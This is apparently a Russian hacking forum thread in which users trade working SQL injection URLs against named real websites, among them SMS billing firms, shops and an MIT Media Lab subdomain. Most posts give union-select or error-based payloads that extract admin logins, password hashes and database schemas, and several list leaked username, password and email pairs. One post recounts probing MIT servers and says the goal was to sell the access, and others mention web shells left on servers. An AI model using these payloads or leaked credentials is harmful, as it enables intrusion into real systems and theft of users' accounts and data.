www.pirok.ru/news.php?id=-1+union+select+1,2,name,4,password,6+from+admin/* сверху логин, снизу пароль админа Админка по адресу: www.pirok.ru/admin
различные смс-билинги: Code: http://www.3bill.com/casestudy.html?client_id=-1+UNION+SELECT+1,CONCAT(0x6472385F3838777777333371,concat(column_name),0x686874666638385F363632),3,4,5,6,7+FROM+information_schema.columns+where+table_name='clients'+limit+1,1/* клиентская часть кстати на другой машине: Code: http://client.3bill.com/extranet/client_pages/cms/lib/exportXML.php?clientid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&service=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&sort=ASC&sheet=detailList.xsl Code: client_name description client_logo case_study picture sortorder COLLATIONS cc_audit ccdata charge_model client_rights clientrate clientv2_adodblog configuration credit_status creditnote_lines creditnotes cron_manager prod_3bill:ccdata cc_audit ccdata charge_model client_rights clientrate clientv2_adodblog configuration credit_status creditnote_lines creditnotes cron_manager cron_manager_log defaultrate defaultrate_copy delivery_method показун: Code: http://www.pokazun.ru/sms.php?showDescr=1&pl=1100+union+select+1+from+users_advPlaces/* посимвольным брутом.. ещё 1 буржуйский с пр6: Code: http://mblox.com/news/press-announcements/press_release.php?press_id=11'+UNION+SELECT+1,concat(email_name,0x3b,email),3,4,5,6,7+FROM+careers+limit+1,1/* Code: mbloxwebdb:careers mbloxwebdb:contact_us_countries mbloxwebdb:doc_reg mbloxwebdb:enquiry mbloxwebdb:events mbloxwebdb:industry_news mbloxwebdb:press_release mbloxwebdb:short_code mbloxwebdb:careers mbloxwebdb:contact_us_countries mbloxwebdb:doc_reg mbloxwebdb:enquiry mbloxwebdb:events mbloxwebdb:industry_news mbloxwebdb:press_release mbloxwebdb:short_code career_id department title location description email email_name publish id local country send_to id name email company country browser ip date_created id name email telephone company country country_other industry enquiry sentto browser ip date_created event_id title location date enddate message logo minilogo email event_link info_link shortcode_id shortcode country company phone_number так что грабить смсками растяжимое понятие) на последок старичок: Code: http://www.digiseller.ru/outside/default.asp?searchstr=-- может кто то и раскрутит)
RussianSt.com - Русскоязычный Портал: Интернет-Каталог, Каталог Бизнесов, Аукцион, Почта, Доски Объявлений, Форум, Чат, Развлечения, Справочная.. andylv:andy2a:[email protected] eliz:Godisov:[email protected] madina:b98facb4a69f2a46b22a54890e2b60f1:[email protected] rusworld:e04e5ecd5ef138690e3ec40a486ea6a1:[email protected] bexpress:42c391321d55118cf2ce5e33964edb33:[email protected] admin:MfPlkg:[email protected] ADMINISTRATOR:3JOIQm:[email protected] glas1976:Ls38T:[email protected] znax:M7hli:[email protected] Forsems:C0apt:[email protected] m8t4t0o0w3v8:guNo4:[email protected] 1363716:cHS39:[email protected] werxerty:NQU2G:[email protected] vjgfp:GmOj3:[email protected] gribok:O1lB9:[email protected] computp:0GHNA:[email protected] virusds:fo3e1:[email protected] pav--eldm:4YW0y[email protected] piciolog:OOOQX[email protected]
http://www.minskvodstroy.by/index.php?p=gallerypic&img_id=-86+union+select+1,2,3,concat_ws(char(124),email,pass),5,6,7,8,9+from+minbud_user+limit+2,1--&galid=6&area=1&ascdesc=desc 1 cdea86d0b320a9485cc1ab925603d4ab ytrewq [email protected] Там еще шел лежит ))
Code: http://azart.net.ua/bookmakers/catalog/?SECT=-1'+union+select+concat('%3Cbr%3E',version(),'%3Cbr%3E',user(),'%3Cbr%3E',database())/*
Comingsoon.net вывод в <meta name="DESCRIPTION" content="4.1.22:comingso_nextra:comingso_nextra@csn-node1-int"> Aen.ru Bmoca.org Eicta.org Bti.cornell.edu - Еда Freedocumentaries.org подбор? Umpcportal.com скуль?
небольшой магазин http://www.landmetzgerei.at/ http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,3,4,5,6,7,8,9/* а вот если user() или version() пытаюсь подставлять, то сервак ругается =( думаю можно было пробовать криптовать, но сейчас уже глаза слипаются чтоб с ним воевать если кому-то интересно можете добить
Лови: http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,convert(concat_ws(0x3A3a,version(),user(),database())+using+latin1),4,5,6,7,8,9/* Таблицы не подбирал, это уж сам давай. _____________________________ Цель - media.mit.edu, пр8, начал копать таблицы не подобрал. Хеши которые сбрутились: остальные в очереди. На madnet.name/tools/madss/ пробил по ReverseIp, сайтов там на серваке стопицотсотинтыщь. Куда с этим рутом коннектицца я х.з. phpmyadmin нужный не нашёл, накопал lyme.media.mit.edu/pmadmin/ ,там авторизация, пассы канешн неподходят. Лезу _http://lyme.media.mit.edu/pmadmin/scripts/setup.php пустило, права видать криво стоят; lyme.media.mit.edu/pmadmin/scripts/ просматриваем файло.Версия phpMyAdmin 2.11.2, уже с**** третяя за 3 дня. Раскрытие путей-/var/www/cerebro.old/includes/, толку 0. Этот грёбанный поддомен в списке сайтов от целевого на серваке не присутствует, он и под другим ip. Куда вобщем с этим рутом лезть я не знаю.Делаю вывод, что раз media.mit.edu -- affect.media.mit.edu на одном серваке, значит рут (полученные пасс\логин) целевой. Но найти зацепку к коннекту немогу. phpMyAdmin from lyme.media.mit.edu вообще фэйк какой то.Всё ужасно криво. Если кто что накопает, обьявите плз. Уже чисто ради интереса.
если есть доступ к mysql.user.. как нащет file_priv? сервак affect.media.mit.edu и mit.edu - разные айпишки... хотя универ один и тот же. наверника не один сервак у них и все запутано для безопасности. mit.edu/admin - раскрытие путей.. (кое каких) ты спрашивал про админку. думаю на этом сайте все держится.. кста как у всех универах должна быть система онлайн доступа к курсам и тд... это большой универ и вобщем очень хороший. если б раскрутить, нас бы в новостях показали..))
http://www.rosana.de Code: http://www.rosana.de/main.asp?main=-1'+union+select+1,concat_ws(0x3a,user,password),3,4,5,6+from+mysql.user/* http://www.alpinestars.se Code: http://www.alpinestars.se/MainVisaUnderBild.asp?nid=1+or+1=(SELECT+TOP+1+cast(user+as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarchar)+FROM+users)--
да скуль _http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
http://bootsus.bri-global.com/ Code: http://bootsus.bri-global.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(admin_username+as+nvarchar)%2Bchar(58)%2Bcast(admin_password+as+nvarchar)+FROM+admin_users)--&sid=1&iid=198 http://www.theovalgroup.com/ Code: http://www.theovalgroup.com/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername+as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nvarchar)+FROM+smtblUser)--&sid=2477&pid=35763 http://www.davy.co.uk/ Code: http://www.davy.co.uk/main.asp?cid=1+or+1=(SELECT+TOP+1+cast(usrUsername+as+nvarchar)%2Bchar(58)%2Bcast(usrPassword+as+nvarchar)+FROM+smtblUser)--&sid=179&pid=43144
http://f1dvd.ru/index.php?p=gallerypic&img_id=-519+union+select+1,2,3,concat_ws(char(124),email,pass),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=45&area=1&ascdesc=desc&print=1 [email protected]|563f311d2613a827c2d3897a024ddf74 51654 Любителям формулы 1 ))
2 sabe Пробей, file_priv как видишь нет, я б отписал. От админки без пассов толку нет, рута ведь туда не втулишь, я видел её. И про админку я спрашивал не на этом сайте Тот линк я к сожалению выложить не могу, слишком дорого мне выйдет. Рут то на media.mit.edu по идее, т.к. media.mit.edu и mit.edu на разных серваках и ипах,соответсвенно affect.media.mit.edu откуда стянули рута, это поддомен корня media.mit.edu на этом серваке, и рут по идее должен быть к нему, а не к mit.edu, сервы то разные... Но про это я писал выше, подразумевая целевой рут. Да в принципе я и ломал не для новостей, а сеошникам\скупщикам загнать как еду пиаристую. Как видишь всё корыстно .
еси найдете чота интересное делитесь впечатлениями Code: http://tusbuscadores.com/notiprensa/display.php?ID=-8077+union+select+1,2,vers ion(),4,5,6,7, 8,9/* Code: http://www.xpg.us/cerebra/display.php?id=-574+uni on+se lect+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/* Code: http://www.rayner.com/products.php?id=-22+union+select+1,version(),3,4,5,6,7,8,9/* Code: http://www.naturalaquario.com/products.php?id=-2+union+select+1,version()/* Code: http://www.nnovia.com/products.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24,25/*
Кардинг запрещен на форуме. Чет давно нигде не копалсо ) Крутить ничто не стал. Смотрите - будет что интересное - отписывайтесь ) [+] 2:dreaming:7bcde95b0707ae0f93aa6ec76745cf02 436948db@localhost:5.0.27:436948db
http://boking.ru/index.php?p=gallerypic&img_id=-65+union+select+1,2,3,concat_ws(char(124),email,pass),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=2&area=1&ascdesc=desc http://boking.ru/admin/ ringo [email protected] Если хорошо поискать можете и шел найти если кому надо